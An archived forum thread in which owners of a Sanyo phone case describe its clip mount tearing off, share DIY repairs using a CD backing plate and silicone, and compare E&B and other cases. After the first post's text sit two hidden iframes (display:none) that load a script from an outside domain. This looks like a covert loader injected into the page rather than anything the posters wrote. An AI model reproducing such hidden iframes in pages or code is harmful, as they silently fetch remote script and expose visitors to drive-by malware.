+ Reply to Thread

Unhappy Sanyo Case, Beware Quality Problem

So I got the new small leather Sanyo case on Wednesday. I was very pleased with the fit and design,,, until last night.

I sat down in my car and there was a slight resistance to the phone by the seat. The little plastic mounting thing ripped through the material that holds it to the case.

The base of the plastic piece is only about 3/4" tall and 1/2" wide. There seems to be some sort of epoxy adhesive that held it to the case, and then the vinyl patch that covered the base and extended down toward the bottom, giving the illusion of a much larger contact area.

I'm trying to figure out whether it's worth taking back or not. If I can figure out how to modify the thing to make it work then I might try to continue using it. But the jury is still out...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Let he who is without sin cast the first stone.

OUCH!!!

Exactly the same thing happened to my Sanyo case. I like it, other than this design flaw. What I am thinking of doing is:
    - cut a metal strip about 2" long by about 1" wide
    - mount the clip base on it with glue and a screw (from the bottom)
    - remove the existing torn leather around the clip base by undoing the sewing (very easy)
    - cut a new piece of black leather to cover the new metal strip
    - sew the leather on the back

or

wait until I find a case I like and buy it. I don't like the E&B case for two reasons: you have to remove the phone from the case to put it in the cradle (which of course you do with Sanyo case too, but it just slips out of the Sanyo easily), and it looks a little bulky (with the flap).

Folks with the E&B case, do I have this right about the E&B case?

I was thinking about something similar to your idea but a little different:

After affixing the plastic base to the metal/plastic plate,

1.cut a hole out of the back side of the main case just big enought for the round part.
    2.Slip the new assembly into the case with the mount protruding out.
    3.Put some type of adhesive on the plate, side facing the back of the case.
    4.Attach some sort of protective surface to the inside part of the plate, which contacts the phone.

Well this is still up in the air at this point but would not require me having to sew something,,, and I'm not exactly a seamstres.

OUCH!!!

So I looked around for some sort of plastic plate which would be durable and somewhat flexible. I finally remembered trying to bend/break a CD once. At that moment it became crystal clear. So I marked to the size that would fit against interior back of the Sanyo case and went to work on my scroll saw.

After that I pretty much followed the steps as layed out on my previous post. I used silicone as the adhesive for holding the plate inside the case (in place). I'm trying it out today and it seems to be working well. I didn't actually affix any type of padded surface to the plastic since the back side of my I300 is against it. I'll continue to monitor the unit for signs of wear. If anything becomes noticeable then I'll pad the surface somehow.

Took some pictures but am still looking for a Photopoint replacement to get them on the web.

OUCH!!!

Originally posted by abward
    Folks with the E&B case, do I have this right about the E&B case?
    The E&B case is anything but bulky. E&B specializes in minimalist cases and the slipper I300 adds very little to the I300. You are correct about needing to remove the I300 from the case in order to sync it, unless you purchase the data cable. Then you can hotsync the I300 without removing it from the case.

Last edited by Marty; 01-21-2002 at 12:04 PM.

UPDATE

So it's a week later (about). The upgraded case is working great. The size and function of the case is ideal. It is holding up to everything so far. This includes getting caught on things as I sit down and get up. The swivel makes it easy to rotate and pull out of the case. The quality and look of the case are also great (after the mod).

Case: $10.00
    Swivel kit: $8.00
    AOL CD: $0.00

Having the best hi-tech phone around the office: Priceless

Now I'll post some pictures tonight if someone want to tell me how to on here.

OUCH!!!

Administrator

Arrow

yes id like to see a pic of this "retro case"...

Sanyo case - Final chapter

My repaired Sanyo case (see append above, and other previous ones) bit the dust yesterday. My repair was fine; the hinge on the clip broke, just like my other one did.

That's it, I have had it with the Sanyo cheapo cases. It is a shame, because the design/form factor/weight was just right for me.

I am getting one of the "Marctronixx" cases on eBay. Don't bid it up y'all !!!!

Administrator

Arrow

I am getting one of the "Marctronixx" cases on eBay. Don't bid it up y'all !!!!
    i believe this case is it!!! its just like the eb case but without the blasted flap! i cant wait to get this case!!!!!

I have the EB case, and if I feel the need to "show off" my i300, I just remove the clip, fold the flap all the way back and tuck it in the waistband of my pants. Kind of like a paddle holster. Holds it securely on the waisband, yet slips out quickly when needed. Even faster than with the clip.
    GCraig

Originally posted by GCraig
    I have the EB case, and if I feel the need to "show off" my i300, I just remove the clip, fold the flap all the way back and tuck it in the waistband of my pants. Kind of like a paddle holster. Holds it securely on the waisband, yet slips out quickly when needed. Even faster than with the clip.
    GCraig
    This makes me wonder: could you tuck the flap inside the case itself and have room for the phone too (squeezing in front of it)? This way you could still use the clip, get the flap out of the way, and use the flap when you feel the need to protect the screen.

Wannabe Techie

Post E&B Case vs. Sanyo Case

Just got my E&B case today and it's definitely the best so far. The only disappointment is how stiff the flap is. I would have liked it to be loose leather so that it raps around the phone better. Also, hate the fact you can't put credit cards or the like (stupid magnet). I also had the damn problem with the Sanyo case. I Krazy glued it and held together for a while until the actual clip itself broke (wierd). Does anybody use the E&B case as a wallet for credit cards or the like?
    "...my palms are too hairy to hide."
    -Eminem

posted by abward

My repaired Sanyo case (see append above, and other previous ones) bit the dust yesterday. My repair was fine;
    the hinge on the clip broke, just like my other one did.

That's why I use the one from the Best Buy kit listed above. It is spring loaded steel and probably won't break. I ditched the clip that came with the Sanyo case and mine is working great.

Most of these little clips are cross compatible. Mine worked with the swivel that was originally on the Sanyo case fine.

OUCH!!!